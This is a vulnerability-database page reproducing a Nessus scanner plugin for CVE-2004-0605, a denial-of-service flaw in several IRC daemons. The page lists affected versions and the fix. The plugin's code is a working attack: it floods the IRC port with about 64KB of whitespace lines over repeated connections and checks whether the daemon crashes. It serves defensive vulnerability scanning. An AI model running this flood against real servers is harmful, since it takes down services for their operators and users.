| Reporter | Title | Published | Views | Family All 4 |
|---|---|---|---|---|
| CVE-2004-0605 | 30 Jun 200404:00 | – | cve | |
| CVE-2004-0605 | 30 Jun 200404:00 | – | cvelist | |
| EUVD-2004-0604 | 7 Oct 202500:30 | – | euvd | |
| CVE-2004-0605 | 6 Dec 200405:00 | – | nvd |
| Source | Link |
|---|---|
| seclists | www.seclists.org/bugtraq/2004/Jun/304 |
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if(description)
{
script_id(14253);
script_version ("1.16");
script_cve_id("CVE-2004-0605");
script_bugtraq_id(10572);
script_name(english:"Multiple IRC Client Non-registered User parse_client_queued Saturation DoS");
script_set_attribute(attribute:"synopsis", value:
"The remote IRC server is affected by a denial of service attack." );
script_set_attribute(attribute:"description", value:
"The remote host is running a version of ircd which is vulnerable
to a rate-limiting Denial of Service (DoS) attack. The flaw is
in the fact that the IRCD daemon reserves more than 500 bytes of
memory for each line received.
An attacker, exploiting this flaw, would need network access to the
IRC server. A successful attack would render the IRC daemon, and
possibly the entire system, unusable.
The following IRC daemons are known to be vulnerable:
IRCD-Hybrid ircd-hybrid 7.0.1
ircd-ratbox ircd-ratbox 1.5.1
ircd-ratbox ircd-ratbox 2.0 rc6" );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2004/Jun/304" );
script_set_attribute(attribute:"solution", value:
"Upgrade to ircd-ratbox 1.5.2 and 2.0rc7 or IRCD-Hybrid 7.0.2." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_cwe_id(16);
script_set_attribute(attribute:"plugin_publication_date", value: "2004/08/10");
script_set_attribute(attribute:"vuln_publication_date", value: "2004/06/18");
script_cvs_date("Date: 2018/11/15 20:50:21");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english:"Multiple IRC daemons Dequeuing DoS check");
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
script_family(english:"Denial of Service");
script_dependencie("find_service1.nasl", "find_service2.nasl", "ircd.nasl");
script_require_ports("Services/irc", 6667);
exit(0);
}
port = get_kb_item("Services/irc");
if (!port)
port = 6667;
if(! get_port_state(port))
exit(0);
# make sure the socket is actually open before we generate
# a massive req
soc = open_sock_tcp(port);
if (! soc)
exit(0);
close(soc);
#display("port 6667 is open\n");
req = '';
for (i=0; i<65536; i += 2)
{
req = req + string(" \n");
}
soc = open_sock_tcp(port);
send(socket:soc, data:req);
close(soc);
for (q=0; q<10; q++)
{
soc = open_sock_tcp(port);
if (soc)
{
send(socket:soc, data:req);
close(soc);
sleep(3);
}
else
{
security_warning(port);
exit(0);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation